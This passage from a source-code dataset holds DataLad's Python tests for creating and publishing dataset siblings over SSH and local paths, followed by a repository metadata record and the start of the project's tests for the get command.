create_sibling, 'datalad-test:/tmp/somewhere', dataset='/nothere')\n # pre-configure a bogus remote\n ds = Dataset(path).create()\n ds.repo.add_remote('bogus', 'http://bogus.url.com')\n # fails to reconfigure by default with generated\n # and also when given an existing name\n for res in (ds.create_sibling('bogus:/tmp/somewhere', on_failure='ignore'),\n ds.create_sibling('datalad-test:/tmp/somewhere', name='bogus', on_failure='ignore')):\n assert_result_count(\n res, 1,\n status='error',\n message=(\n \"sibling '%s' already configured (specify alternative name, or force reconfiguration via --existing\",\n 'bogus'))\n\n if not have_webui():\n # need an extension package\n assert_raises(RuntimeError, ds.create_sibling, '', ui=True)\n\n\n@slow # 26sec on travis\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_target_ssh_simple(origin=None, src_path=None, target_rootpath=None):\n ca = dict(result_renderer='disabled')\n test_fname = 'test-annex.dat'\n orig = Dataset(origin).create(**ca)\n (orig.pathobj / test_fname).write_text('some')\n orig.save(**ca)\n\n port = get_ssh_port(\"datalad-test\")\n # prepare src\n source = install(\n src_path, source=origin,\n result_xfm='datasets', return_type='item-or-list')\n\n target_path = opj(target_rootpath, \"basic\")\n with swallow_logs(new_level=logging.ERROR) as cml:\n create_sibling(\n dataset=source,\n name=\"local_target\",\n sshurl=\"ssh://datalad-test:{}\".format(port),\n target_dir=target_path,\n ui=have_webui())\n assert_not_in('enableremote local_target failed', cml.out)\n\n target_gitrepo = GitRepo(target_path, create=False) # raises if not a git repo\n assert_in(\"local_target\", source.repo.get_remotes())\n # Both must be annex or git repositories\n src_is_annex = AnnexRepo.is_valid_repo(src_path)\n eq_(src_is_annex, 
AnnexRepo.is_valid_repo(target_path))\n # And target one should be known to have a known UUID within the source if annex\n if src_is_annex:\n lclcfg = AnnexRepo(src_path).config\n target_aversion = target_gitrepo.config['annex.version']\n # basic config in place\n eq_(lclcfg.get('remote.local_target.annex-ignore'), 'false')\n ok_(lclcfg.get('remote.local_target.annex-uuid'))\n\n # do it again without force, but use a different name to avoid initial checks\n # for existing remotes:\n with assert_raises(RuntimeError) as cm:\n assert_create_sshwebserver(\n dataset=source,\n name=\"local_target_alt\",\n sshurl=\"ssh://datalad-test\",\n target_dir=target_path)\n ok_(str(cm.value).startswith(\n \"Target path %s already exists.\" % target_path))\n if src_is_annex:\n # Before we \"talk\" to it with git-annex directly -- we must prevent auto-upgrades\n # since the git-annex on \"remote server\" (e.g. docker container) could be outdated\n # and not support new git-annex repo version\n target_gitrepo.config.set('annex.autoupgraderepository', \"false\", scope='local')\n try:\n target_description = AnnexRepo(target_path, create=False).get_description()\n except CommandError as e:\n if 'is at unsupported version' not in str(e.stderr):\n raise\n # we just would skip this part of the test and avoid future similar query\n target_description = None\n else:\n assert target_gitrepo.config['annex.version'] == target_aversion\n assert_not_equal(target_description, None)\n assert_not_equal(target_description, target_path)\n # on yoh's laptop TMPDIR is under HOME, so things start to become\n # tricky since then target_path is shortened and we would need to know\n # remote $HOME. To not over-complicate and still test, test only for\n # the basename of the target_path\n ok_endswith(target_description, basename(target_path))\n # now, with force and correct url, which is also used to determine\n # target_dir\n # Note: on windows absolute path is not url conform. But this way it's easy\n # to test, that ssh path is correctly used.\n if not on_windows:\n # add random file under target_path, to explicitly test existing=replace\n open(opj(target_path, 'random'), 'w').write('123')\n\n @with_testsui(responses=[\"yes\"])\n def interactive_assert_create_sshwebserver():\n assert_create_sshwebserver(\n dataset=source,\n name=\"local_target\",\n sshurl=\"ssh://datalad-test\" + target_path,\n publish_by_default=DEFAULT_BRANCH,\n existing='replace',\n ui=have_webui(),\n )\n interactive_assert_create_sshwebserver()\n\n eq_(\"ssh://datalad-test\" + urlquote(target_path),\n source.repo.get_remote_url(\"local_target\"))\n ok_(source.repo.get_remote_url(\"local_target\", push=True) is None)\n\n # ensure target tree actually replaced by source\n assert_false(exists(opj(target_path, 'random')))\n\n if src_is_annex:\n lclcfg = AnnexRepo(src_path).config\n eq_(lclcfg.get('remote.local_target.annex-ignore'), 'false')\n # valid uuid\n eq_(lclcfg.get('remote.local_target.annex-uuid').count('-'), 4)\n # should be added too, even if URL matches prior state\n eq_(lclcfg.get('remote.local_target.push'), DEFAULT_BRANCH)\n\n # again, by explicitly passing urls. Since we are on datalad-test, the\n # could use local path, but then it would not use \"remote\" git-annex\n # and thus potentially lead to incongruent result. So make URLs a bit\n # different by adding trailing /. 
to regular target_url\n target_url = \"ssh://datalad-test\" + target_path + \"/.\"\n cpkwargs = dict(\n dataset=source,\n name=\"local_target\",\n sshurl=\"ssh://datalad-test\",\n target_dir=target_path,\n target_url=target_url,\n target_pushurl=\"ssh://datalad-test\" + target_path,\n ui=have_webui(),\n )\n\n @with_testsui(responses=['yes'])\n def interactive_assert_create_sshwebserver():\n assert_create_sshwebserver(existing='replace', **cpkwargs)\n interactive_assert_create_sshwebserver()\n\n if src_is_annex and target_description:\n target_description = AnnexRepo(target_path,\n create=False).get_description()\n eq_(target_description, target_url)\n\n eq_(target_url,\n source.repo.get_remote_url(\"local_target\"))\n eq_(\"ssh://datalad-test\" + target_path,\n source.repo.get_remote_url(\"local_target\", push=True))\n\n if have_webui():\n from datalad_deprecated.tests.test_create_sibling_webui import (\n assert_publish_with_ui,\n )\n assert_publish_with_ui(target_path)\n\n # now, push should work:\n push(dataset=source, to=\"local_target\")\n\n # and we should be able to 'reconfigure'\n def process_digests_mtimes(digests, mtimes):\n # it should have triggered a hook, which would have created log and metadata files\n check_metadata = False\n for part in 'logs', 'metadata':\n metafiles = [k for k in digests if k.startswith(_path_('.git/datalad/%s/' % part))]\n # This is in effect ONLY if we have \"compatible\" datalad installed on remote\n # end. ATM we don't have easy way to guarantee that AFAIK (yoh),\n # so let's not check/enforce (TODO)\n # assert(len(metafiles) >= 1) # we might have 2 logs if timestamps do not collide ;)\n # Let's actually do it to some degree\n if part == 'logs':\n # always should have those:\n assert (len(metafiles) >= 1)\n with open(opj(target_path, metafiles[0])) as f:\n if 'no datalad found' not in f.read():\n check_metadata = True\n if part == 'metadata':\n eq_(len(metafiles), bool(check_metadata))\n for f in metafiles:\n digests.pop(f)\n mtimes.pop(f)\n # and just pop some leftovers from annex\n # and ignore .git/logs content (gh-5298)\n for f in list(digests):\n if f.startswith('.git/annex/mergedrefs') \\\n or f.startswith('.git/logs/'):\n digests.pop(f)\n mtimes.pop(f)\n\n if not have_webui():\n # the rest of the test assumed that we have uploaded a UI\n return\n orig_digests, orig_mtimes = get_mtimes_and_digests(target_path)\n process_digests_mtimes(orig_digests, orig_mtimes)\n\n import time\n time.sleep(0.1) # just so that mtimes change\n assert_create_sshwebserver(existing='reconfigure', **cpkwargs)\n digests, mtimes = get_mtimes_and_digests(target_path)\n process_digests_mtimes(digests, mtimes)\n\n assert_dict_equal(orig_digests, digests) # nothing should change in terms of content\n\n # but some files should have been modified\n modified_files = {k for k in mtimes if orig_mtimes.get(k, 0) != mtimes.get(k, 0)}\n # collect which files were expected to be modified without incurring any changes\n ok_modified_files = {\n _path_('.git/hooks/post-update'), 'index.html',\n }\n ok_modified_files.add(_path_('.git/config'))\n ok_modified_files.update({f for f in digests if f.startswith(_path_('.git/datalad/web'))})\n # it seems that with some recent git behavior has changed a bit\n # and index might get touched\n if _path_('.git/index') in modified_files:\n ok_modified_files.add(_path_('.git/index'))\n ok_(modified_files.issuperset(ok_modified_files))\n\n\n@slow # 53.8496s\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef 
check_target_ssh_recursive(use_ssh, origin, src_path, target_path):\n _mk_submodule_annex(origin, 'test-annex.dat', 'whatever')\n\n # prepare src\n source = install(src_path, source=origin, recursive=True)\n\n sub1 = Dataset(opj(src_path, \"subm 1\"))\n sub2 = Dataset(opj(src_path, \"2\"))\n\n for flat in False, True:\n target_path_ = target_dir_tpl = target_path + \"-\" + str(flat)\n\n if flat:\n target_dir_tpl += \"/prefix%RELNAME\"\n sep = '-'\n else:\n sep = os.path.sep\n\n if use_ssh:\n sshurl = \"ssh://datalad-test\" + target_path_\n else:\n sshurl = target_path_\n\n remote_name = 'remote-' + str(flat)\n with chpwd(source.path):\n assert_create_sshwebserver(\n name=remote_name,\n sshurl=sshurl,\n target_dir=target_dir_tpl,\n recursive=True,\n ui=have_webui())\n\n # raise if git repos were not created\n for suffix in [sep + 'subm 1', sep + '2', '']:\n target_dir = opj(target_path_, 'prefix' if flat else \"\").rstrip(os.path.sep) + suffix\n # raise if git repos were not created\n GitRepo(target_dir, create=False)\n\n if have_webui():\n from datalad_deprecated.tests.test_create_sibling_webui import (\n assert_publish_with_ui,\n )\n assert_publish_with_ui(target_dir, rootds=not suffix, flat=flat)\n\n for repo in [source.repo, sub1.repo, sub2.repo]:\n assert_not_in(\"local_target\", repo.get_remotes())\n\n # now, push should work:\n push(dataset=source, to=remote_name)\n\n # verify that we can create-sibling which was created later and possibly\n # first published in super-dataset as an empty directory\n sub3_name = 'subm 3-%s' % flat\n sub3 = source.create(sub3_name)\n # since is an empty value to force it to consider all changes since we published\n # already\n with chpwd(source.path):\n # as we discussed in gh-1495 we use the last-published state of the base\n # dataset as the indicator for modification detection with since='^'\n # hence we must not publish the base dataset on its own without recursion,\n # if we want to have this mechanism do its job\n #push(to=remote_name) # no recursion\n out1 = assert_create_sshwebserver(\n name=remote_name,\n sshurl=sshurl,\n target_dir=target_dir_tpl,\n recursive=True,\n existing='skip',\n ui=have_webui(),\n since='^'\n )\n assert_postupdate_hooks(target_path_, installed=have_webui(), flat=flat)\n assert_result_count(out1, 1, status='ok', sibling_name=remote_name)\n\n # ensure that nothing is created since since is used.\n # Also cover deprecation for since='' support. 
Takes just 60ms or so.\n # TODO: change or remove when removing since='' deprecation support\n out2 = assert_create_sshwebserver(\n name=remote_name,\n sshurl=sshurl,\n target_dir=target_dir_tpl,\n recursive=True,\n existing='skip',\n ui=have_webui(),\n since=''\n )\n assert_result_count(out2, 1, status='notneeded', sibling_name=remote_name)\n\n # so it was created on remote correctly and wasn't just skipped\n assert(Dataset(_path_(target_path_, ('prefix-' if flat else '') + sub3_name)).is_installed())\n push(dataset=source, to=remote_name, recursive=True, since='^') # just a smoke test\n\n\n# we are explicitly testing deprecated since='' inside\[email protected](\"ignore: 'since' should point to commitish\")\n@slow # 28 + 19sec on travis\ndef test_target_ssh_recursive():\n skip_if_on_windows()\n check_target_ssh_recursive(False)\n skip_ssh(check_target_ssh_recursive)(True)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef check_target_ssh_since(use_ssh, origin, src_path, target_path):\n _mk_submodule_annex(origin, 'test-annex.dat', 'whatever')\n\n if use_ssh:\n sshurl = \"ssh://datalad-test\" + target_path\n else:\n sshurl = target_path\n # prepare src\n source = install(src_path, source=origin, recursive=True)\n eq_(len(source.subdatasets()), 2)\n # get a new subdataset and make sure it is committed in the super\n source.create('brandnew')\n eq_(len(source.subdatasets()), 3)\n assert_repo_status(source.path)\n\n # and now we create a sibling for the new subdataset only\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n since='HEAD~1')\n # there is one thing in the target directory only, and that is the\n # remote repo of the newly added subdataset\n\n target = Dataset(target_path)\n ok_(not target.is_installed()) # since we didn't create it due to since\n eq_(['brandnew'], os.listdir(target_path))\n\n # now test functionality if we add a subdataset with a subdataset\n brandnew2 = source.create('brandnew2')\n brandnewsub = brandnew2.create('sub')\n brandnewsubsub = brandnewsub.create('sub')\n # and now we create a sibling for the new subdataset only\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n existing='skip')\n # verify that it created the immediate subdataset\n ok_(Dataset(_path_(target_path, 'brandnew2')).is_installed())\n # but not the subs since they were not saved, thus even push would not operate\n # on them yet, so no reason for us to create them until subdatasets are saved\n ok_(not Dataset(_path_(target_path, 'brandnew2/sub')).is_installed())\n\n source.save(recursive=True)\n\n # and if repeated now -- will create those sub/sub\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n existing='skip')\n # verify that it created the immediate subdataset\n ok_(Dataset(_path_(target_path, 'brandnew2/sub')).is_installed())\n ok_(Dataset(_path_(target_path, 'brandnew2/sub/sub')).is_installed())\n\n # now we will try with --since while creating even deeper nested one, and ensuring\n # it is created -- see https://github.com/datalad/datalad/issues/6596\n brandnewsubsub.create('sub')\n source.save(recursive=True)\n # and now we create a sibling for the new subdataset only\n assert_create_sshwebserver(\n name='dominique_carrera',\n dataset=source,\n sshurl=sshurl,\n recursive=True,\n existing='skip',\n since=f'{DEFAULT_REMOTE}/{DEFAULT_BRANCH}')\n # verify that it created the 
sub and sub/sub\n ok_(Dataset(_path_(target_path, 'brandnew2/sub/sub/sub')).is_installed())\n\n # we installed without web ui - no hooks should be created/enabled\n assert_postupdate_hooks(_path_(target_path, 'brandnew'), installed=False)\n\n\n@slow # 10sec + ? on travis\ndef test_target_ssh_since():\n skip_if_on_windows()\n skip_ssh(check_target_ssh_since)(True)\n check_target_ssh_since(False)\n\n\n@skip_if_on_windows\n@skip_if_root\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef check_failon_no_permissions(use_ssh, src_path, target_path):\n if use_ssh:\n sshurl = \"ssh://datalad-test\" + opj(target_path, 'ds')\n else:\n sshurl = opj(target_path, 'ds')\n ds = Dataset(src_path).create()\n # remove user write permissions from target path\n chmod(target_path, stat.S_IREAD | stat.S_IEXEC)\n assert_raises(\n CommandError,\n ds.create_sibling,\n name='noperm',\n sshurl=sshurl)\n # restore permissions\n chmod(target_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)\n assert_create_sshwebserver(\n name='goodperm',\n dataset=ds,\n sshurl=sshurl)\n\n\ndef test_failon_no_permissions():\n skip_ssh(check_failon_no_permissions)(True)\n check_failon_no_permissions(False)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef check_replace_and_relative_sshpath(use_ssh, src_path, dst_path):\n # We need to come up with the path relative to our current home directory\n # https://github.com/datalad/datalad/issues/1653\n # but because we override HOME the HOME on the remote end would be\n # different even though a datalad-test. So we need to query it\n if use_ssh:\n from datalad import ssh_manager\n ssh = ssh_manager.get_connection('datalad-test')\n remote_home, err = ssh('pwd')\n remote_home = remote_home.rstrip('\\n')\n dst_relpath = os.path.relpath(dst_path, remote_home)\n url = 'datalad-test:%s' % dst_relpath\n sibname = 'datalad-test'\n else:\n url = dst_path\n sibname = 'local'\n\n ds = Dataset(src_path).create()\n create_tree(ds.path, {'sub.dat': 'lots of data'})\n ds.save('sub.dat')\n res = ds.create_sibling(url, ui=have_webui())\n assert_in_results(res, action=\"create_sibling\", sibling_name=sibname)\n published = ds.push(to=sibname, data='anything')\n assert_result_count(published, 1, path=opj(ds.path, 'sub.dat'))\n if have_webui():\n # verify that hook runs and there is nothing in stderr\n # since it exits with 0 exit even if there was a problem\n out = Runner(cwd=opj(dst_path, '.git')).run([_path_('hooks/post-update')],\n protocol=StdOutErrCapture)\n assert_false(out['stdout'])\n assert_false(out['stderr'])\n\n # Verify that we could replace and publish no problem\n # https://github.com/datalad/datalad/issues/1656\n # Strangely it spits outs IncompleteResultsError exception atm... 
so just\n # checking that it fails somehow\n res = ds.create_sibling(url, on_failure='ignore')\n assert_status('error', res)\n assert_in('already configured', res[0]['message'][0])\n # \"Settings\" such as UI do not persist, so we specify it again\n # for the test below depending on it\n with assert_raises(RuntimeError):\n # but we cannot replace in non-interactive mode\n ds.create_sibling(url, existing='replace', ui=have_webui())\n\n # We don't have context manager like @with_testsui, so\n @with_testsui(responses=[\"yes\"])\n def interactive_create_sibling():\n ds.create_sibling(url, existing='replace', ui=have_webui())\n interactive_create_sibling()\n\n published2 = ds.push(to=sibname, data='anything')\n assert_result_count(published2, 1, path=opj(ds.path, 'sub.dat'))\n\n # and one more test since in above test it would not puke ATM but just\n # not even try to copy since it assumes that file is already there\n create_tree(ds.path, {'sub2.dat': 'more data'})\n ds.save('sub2.dat')\n published3 = ds.push(to=sibname, data='nothing') # we publish just git\n assert_result_count(published3, 0, path=opj(ds.path, 'sub2.dat'))\n\n if not have_webui():\n return\n\n # now publish \"with\" data, which should also trigger the hook!\n # https://github.com/datalad/datalad/issues/1658\n from glob import glob\n\n from datalad.consts import WEB_META_LOG\n logs_prior = glob(_path_(dst_path, WEB_META_LOG, '*'))\n published4 = ds.push(to=sibname, data='anything')\n assert_result_count(published4, 1, path=opj(ds.path, 'sub2.dat'))\n logs_post = glob(_path_(dst_path, WEB_META_LOG, '*'))\n eq_(len(logs_post), len(logs_prior) + 1)\n\n assert_postupdate_hooks(dst_path)\n\n\n@slow # 14 + 10sec on travis\ndef test_replace_and_relative_sshpath():\n skip_if_on_windows()\n skip_ssh(check_replace_and_relative_sshpath)(True)\n check_replace_and_relative_sshpath(False)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(suffix=\"target\")\ndef _test_target_ssh_inherit(standardgroup, ui, use_ssh, src_path, target_path):\n ds = Dataset(src_path).create()\n if use_ssh:\n target_url = 'datalad-test:%s' % target_path\n else:\n target_url = target_path\n remote = \"magical\"\n # for the test of setting a group, will just smoke test while using current\n # user's group\n ds.create_sibling(target_url, name=remote, shared='group', group=os.getgid(), ui=ui) # not doing recursively\n if standardgroup:\n ds.repo.set_preferred_content('wanted', 'standard', remote)\n ds.repo.set_preferred_content('group', standardgroup, remote)\n ds.publish(to=remote)\n\n # now a month later we created a new subdataset... a few of the nested ones\n # A known hiccup happened when there\n # is also subsub ds added - we might incorrectly traverse and not prepare\n # sub first for subsub to inherit etc\n parent_ds = ds\n subdss = []\n nlevels = 2 # gets slow: 1 - 43 sec, 2 - 49 sec , 3 - 69 sec\n for levels in range(nlevels):\n subds = parent_ds.create('sub')\n create_tree(subds.path, {'sub.dat': 'lots of data'})\n parent_ds.save('sub', recursive=True)\n ok_file_under_git(subds.path, 'sub.dat', annexed=True)\n parent_ds = subds\n subdss.append(subds)\n\n target_subdss = [\n Dataset(opj(*([target_path] + ['sub'] * (i+1))))\n for i in range(nlevels)\n ]\n # since we do not have yet/thus have not used an option to record to publish\n # to that sibling by default (e.g. 
--set-upstream), if we run just ds.publish\n # -- should fail\n assert_result_count(\n ds.publish(on_failure='ignore'),\n 1,\n status='impossible',\n message='No target sibling configured for default publication, please specify via --to')\n ds.publish(to=remote) # should be ok, non recursive; BUT it (git or us?) would\n # create an empty sub/ directory\n assert_postupdate_hooks(target_path, installed=ui)\n for target_sub in target_subdss:\n ok_(not target_sub.is_installed()) # still not there\n res = ds.publish(to=remote, recursive=True, on_failure='ignore')\n assert_result_count(res, 1 + len(subdss))\n assert_status(('error', 'notneeded'), res)\n assert_result_count(\n res, len(subdss),\n status='error',\n message=(\"Unknown target sibling '%s' for publication\", 'magical'))\n\n # Finally publishing with inheritance\n ds.publish(to=remote, recursive=True, missing='inherit')\n assert_postupdate_hooks(target_path, installed=ui)\n\n def check_dss():\n # we added the remote and set all the\n for subds in subdss:\n eq_(subds.repo.get_preferred_content('wanted', remote), 'standard' if standardgroup else '')\n eq_(subds.repo.get_preferred_content('group', remote), standardgroup or '')\n\n for target_sub in target_subdss:\n ok_(target_sub.is_installed()) # it is there now\n eq_(target_sub.repo.config.get('core.sharedrepository'), '1')\n # and we have transferred the content\n if standardgroup and standardgroup == 'backup':\n # only then content should be copied\n ok_file_has_content(opj(target_sub.path, 'sub.dat'), 'lots of data')\n else:\n # otherwise nothing is copied by default\n assert_false(target_sub.repo.file_has_content('sub.dat'))\n\n check_dss()\n # and it should be ok to reconfigure the full hierarchy of datasets\n # while \"inheriting\". No URL must be specified, and we must not blow\n # but just issue a warning for the top level dataset which has no super,\n # so cannot inherit anything - use case is to fixup/establish the full\n # hierarchy on the remote site\n ds.save(recursive=True) # so we have committed hierarchy for create_sibling\n with swallow_logs(logging.WARNING) as cml:\n out = ds.create_sibling(\n None, name=remote, existing=\"reconfigure\", inherit=True,\n ui=ui, recursive=True)\n eq_(len(out), 1 + len(subdss))\n assert_in(\"Cannot determine super dataset\", cml.out)\n\n check_dss()\n\n\n@slow # 49 sec\ndef test_target_ssh_inherit():\n skip_if_on_windows() # create_sibling incompatible with win servers\n try:\n from datalad_deprecated.publish import Publish\n except ImportError:\n raise SkipTest('Test requires `publish()` from datalad-deprecated')\n # TODO: was waiting for resolution on\n # https://github.com/datalad/datalad/issues/1274\n # which is now closed but this one is failing ATM, thus leaving as TODO\n # _test_target_ssh_inherit(None) # no wanted etc\n # Takes too long so one will do with UI and another one without\n skip_ssh(_test_target_ssh_inherit)('manual', have_webui(), True) # manual -- no load should be annex copied\n _test_target_ssh_inherit('backup', False, False) # backup -- all data files\n\n\n@with_testsui(responses=[\"no\", \"yes\"])\n@with_tempfile(mkdir=True)\ndef check_exists_interactive(use_ssh, path):\n origin = Dataset(opj(path, \"origin\")).create()\n sibling_path = opj(path, \"sibling\")\n\n # Initiate sibling directory with \"stuff\"\n create_tree(sibling_path, {'stuff': ''})\n\n if use_ssh:\n sshurl = 'datalad-test:' + sibling_path\n else:\n sshurl = sibling_path\n\n # Should fail\n with assert_raises(RuntimeError):\n 
origin.create_sibling(sshurl)\n\n # Since first response is \"no\" - we should fail here again:\n with assert_raises(RuntimeError):\n origin.create_sibling(sshurl, existing='replace')\n # and there should be no initiated repository\n assert not Dataset(sibling_path).is_installed()\n # But we would succeed on the 2nd try, since answer will be yes\n origin.create_sibling(sshurl, existing='replace')\n assert Dataset(sibling_path).is_installed()\n # And with_testsui should not fail with \"Unused responses left\"\n\n\ndef test_check_exists_interactive():\n skip_if_on_windows()\n skip_ssh(check_exists_interactive)(True)\n check_exists_interactive(False)\n\n\n@skip_if_on_windows\n@with_tempfile(mkdir=True)\ndef test_local_relpath(path=None):\n path = Path(path)\n ds_main = Dataset(path / \"main\").create()\n ds_main.create(\"subds\")\n\n ds_main.create_sibling(\n name=\"relpath-bound\", recursive=True,\n sshurl=os.path.relpath(str(path / \"a\"), ds_main.path))\n ok_((path / \"a\" / \"subds\").exists())\n\n with chpwd(path):\n create_sibling(\n dataset=ds_main.path,\n name=\"relpath-unbound\", recursive=True,\n sshurl=\"b\")\n ok_((path / \"b\" / \"subds\").exists())\n\n with chpwd(ds_main.path):\n create_sibling(\n name=\"relpath-unbound-dsnone\", recursive=True,\n sshurl=os.path.relpath(str(path / \"c\"), ds_main.path))\n ok_((path / \"c\" / \"subds\").exists())\n\n\n@skip_if_on_windows\n@with_tempfile(mkdir=True)\ndef test_local_path_target_dir(path=None):\n path = Path(path)\n ds_main = Dataset(path / \"main\").create()\n\n ds_main.create_sibling(\n name=\"abspath-targetdir\",\n sshurl=str(path / \"a\"), target_dir=\"tdir\")\n ok_((path / \"a\" / \"tdir\").exists())\n\n ds_main.create_sibling(\n name=\"relpath-bound-targetdir\",\n sshurl=os.path.relpath(str(path / \"b\"), ds_main.path),\n target_dir=\"tdir\")\n ok_((path / \"b\" / \"tdir\").exists())\n\n with chpwd(path):\n create_sibling(\n dataset=ds_main.path,\n name=\"relpath-unbound-targetdir\",\n sshurl=\"c\", target_dir=\"tdir\")\n ok_((path / \"c\" / \"tdir\").exists())\n\n ds_main.create(\"subds\")\n\n ds_main.create_sibling(\n name=\"rec-plain-targetdir\", recursive=True,\n sshurl=str(path / \"d\"), target_dir=\"tdir\")\n ok_((path / \"d\" / \"tdir\" / \"subds\").exists())\n\n ds_main.create_sibling(\n name=\"rec-template-targetdir\", recursive=True,\n sshurl=str(path / \"e\"), target_dir=\"d%RELNAME\")\n ok_((path / \"e\" / \"d\").exists())\n ok_((path / \"e\" / \"d-subds\").exists())\n\n\n@slow # 12sec on Yarik's laptop\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_non_master_branch(src_path=None, target_path=None):\n src_path = Path(src_path)\n target_path = Path(target_path)\n\n ds_a = Dataset(src_path).create()\n # Rename rather than checking out another branch so that the default branch\n # doesn't exist in any state.\n ds_a.repo.call_git([\"branch\", \"-m\", DEFAULT_BRANCH, \"other\"])\n (ds_a.pathobj / \"afile\").write_text(\"content\")\n sa = ds_a.create(\"sub-a\")\n sa.repo.checkout(\"other-sub\", [\"-b\"])\n ds_a.create(\"sub-b\")\n\n ds_a.save()\n ds_a.create_sibling(\n name=\"sib\", recursive=True,\n sshurl=\"ssh://datalad-test\" + str(target_path / \"b\"))\n ds_a.push(to=\"sib\", data=\"anything\")\n\n ds_b = Dataset(target_path / \"b\")\n\n def get_branch(repo):\n return repo.get_corresponding_branch() or repo.get_active_branch()\n\n # The HEAD for the create-sibling matches what the branch was in\n # the original repo.\n 
eq_(get_branch(ds_b.repo), \"other\")\n ok_((ds_b.pathobj / \"afile\").exists())\n\n eq_(get_branch(Dataset(target_path / \"b\" / \"sub-a\").repo),\n \"other-sub\")\n eq_(get_branch(Dataset(target_path / \"b\" / \"sub-b\").repo),\n DEFAULT_BRANCH)\n\n\n@known_failure_windows # https://github.com/datalad/datalad/issues/5287\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_preserve_attrs(src=None, dest=None):\n create_tree(src, {\"src\": {\"foo\": {\"bar\": \"This is test text.\"}}})\n os.utime(opj(src, \"src\", \"foo\", \"bar\"), (1234567890, 1234567890))\n _RunnerAdapter().put(opj(src, \"src\"), dest, recursive=True, preserve_attrs=True)\n s = os.stat(opj(dest, \"src\", \"foo\", \"bar\"))\n assert s.st_atime == 1234567890\n assert s.st_mtime == 1234567890\n with open(opj(dest, \"src\", \"foo\", \"bar\")) as fp:\n assert fp.read() == \"This is test text.\"\n\n\n@known_failure_windows # backstory: https://github.com/datalad/datalad/pull/7265\n@with_tempfile(mkdir=True)\ndef test_only_one_level_without_recursion(path=None):\n # this tests for https://github.com/datalad/datalad/issues/5614: accidental\n # recursion of one level by default\n path = Path(path)\n ds_main = Dataset(path / \"main\").create()\n ds_main.create('sub1')\n\n ds_main.create_sibling(\n name=\"dummy\",\n sshurl=str(path / \"toplevelsibling\"))\n # this should exist\n ok_((path / 'toplevelsibling').exists())\n # this shouldn't\n assert_false(Path(path / 'toplevelsibling' / 'sub1').exists())\n" }, { "alpha_fraction": 0.6176891326904297, "alphanum_fraction": 0.6269170641899109, "avg_line_length": 36.30424118041992, "blob_id": "6106c41e92d024628579689129458735506d8a3f", "content_id": "4593c5cd42f603a7e393e6c84069c848ad57bf16", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30776, "license_type": "permissive", "max_line_length": 113, "num_lines": 825, "path": "/datalad/distribution/tests/test_get.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test get action\n\n\"\"\"\n\nfrom os import curdir\nfrom os.path import basename\nfrom os.path import join as opj\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad.api import (\n clone,\n create,\n get,\n install,\n)\nfrom datalad.distribution.get import (\n _get_flexible_source_candidates_for_submodule,\n)\nfrom datalad.interface.results import only_matching_paths\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import (\n InsufficientArgumentsError,\n RemoteNotAvailableError,\n)\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_testdatasets import (\n _make_dataset_hierarchy,\n _mk_submodule_annex,\n)\nfrom datalad.tests.utils_pytest import (\n create_tree,\n assert_false,\n assert_raises,\n assert_in,\n assert_status,\n assert_in_results,\n assert_not_in_results,\n assert_repo_status,\n assert_result_count,\n assert_message,\n DEFAULT_REMOTE,\n eq_,\n known_failure_windows,\n known_failure_githubci_win,\n ok_,\n serve_path_via_http,\n skip_if_adjusted_branch,\n skip_ssh,\n skip_if_on_windows,\n slow,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n 
rmtree,\n with_pathsep,\n)\n\nfrom ..dataset import Dataset\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_get_flexible_source_candidates_for_submodule(t=None, t2=None, t3=None):\n f = _get_flexible_source_candidates_for_submodule\n # for now without mocking -- let's just really build a dataset\n ds = create(t)\n sub = ds.create('sub')\n clone = install(\n t2, source=t,\n result_xfm='datasets', return_type='item-or-list')\n\n # first one could just know about itself or explicit url provided\n sshurl = 'ssh://e.c'\n httpurl = 'http://e.c'\n ds_subpath = str(ds.pathobj / 'sub')\n eq_(f(ds, dict(path=ds_subpath, parentds=ds.path)), [])\n eq_(f(ds, dict(path=ds_subpath, parentds=ds.path, gitmodule_url=sshurl)),\n [dict(cost=900, name='local', url=sshurl)])\n eq_(f(ds, dict(path=ds_subpath, parentds=ds.path, gitmodule_url=httpurl)),\n [dict(cost=900, name='local', url=httpurl)])\n\n # but if we work on dsclone then it should also add urls deduced from its\n # own location default remote for current branch\n clone_subpath = str(clone.pathobj / 'sub')\n eq_(f(clone, dict(path=clone_subpath, parentds=clone.path)),\n [dict(cost=650, name=DEFAULT_REMOTE, url=ds_subpath)])\n eq_(f(clone, dict(path=clone_subpath, parentds=clone.path, gitmodule_url=sshurl)),\n [dict(cost=600, name=DEFAULT_REMOTE, url=sshurl),\n dict(cost=650, name=DEFAULT_REMOTE, url=ds_subpath)])\n eq_(f(clone, 